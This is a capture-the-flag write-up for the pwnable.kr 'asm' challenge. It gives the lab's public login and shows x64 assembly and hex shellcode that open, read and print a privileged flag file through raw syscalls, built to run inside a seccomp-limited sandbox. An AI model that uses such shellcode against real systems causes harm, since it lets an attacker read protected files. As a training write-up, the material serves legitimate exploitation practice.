18 - asm

Last updated 4 years ago

The Challenge

Mommy! I think I know how to make shellcodes

ssh asm@pwnable.kr -p2222 (pw: guest)

The Solution

The challenge directory contains a readme:

once you connect to port 9026, the "asm" binary will be executed under asm_pwn privilege. make connection to challenge (nc 0 9026) then get the flag. (file name of the flag is same as the one in this directory)

The directory really contains a file with an awfully long name.

It's time to run the binary:

Our input should be x64 shellcode that uses only open, read and write to print the flag. A peek at the source code shows there aren't any shenanigans; it's really what we need to do.

The source also contains shellcode which our shellcode gets concatenated to. Let's look at it:

It zeros the registers. That's actually quite nice of pwnable's side, thanks ^_^

It's time to write some pure assembly! Using the wonderful table, we wrote assembly that opens the flag file, reads it and writes it to stdout.

mov rax, 2
mov rdi, 0x4141406f
syscall
mov rdi, rax
mov rax, 0
mov rsi, 0x4141406f
mov rdx, 0x30
syscall
mov rax, 1
mov rdi, 1
syscall

# shellcode: \x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05

You may be asking yourself "what's that address that is assigned to rsi and rdi?" We concatenate the flag file name to the end of the shellcode, and that's its address. We also read the flag into the same location. The final shellcode:

\x48\xC7\xC0\x02\x00\x00\x00\x48\xC7\xC7\x6F\x40\x41\x41\x0F\x05\x48\x89\xC7\x48\xC7\xC0\x00\x00\x00\x00\x48\xC7\xC6\x6F\x40\x41\x41\x48\xC7\xC2\x30\x00\x00\x00\x0F\x05\x48\xC7\xC0\x01\x00\x00\x00\x48\xC7\xC7\x01\x00\x00\x00\x0F\x05\x25\x00\x00\x00\x00\x0F\x05\x74\x68\x69\x73\x5f\x69\x73\x5f\x70\x77\x6e\x61\x62\x6c\x65\x2e\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x66\x69\x6c\x65\x5f\x70\x6c\x65\x61\x73\x65\x5f\x72\x65\x61\x64\x5f\x74\x68\x69\x73\x5f\x66\x69\x6c\x65\x2e\x73\x6f\x72\x72\x79\x5f\x74\x68\x65\x5f\x66\x69\x6c\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x73\x5f\x76\x65\x72\x79\x5f\x6c\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x6e\x67\x00

The last line and a half is my input, don't get confused :)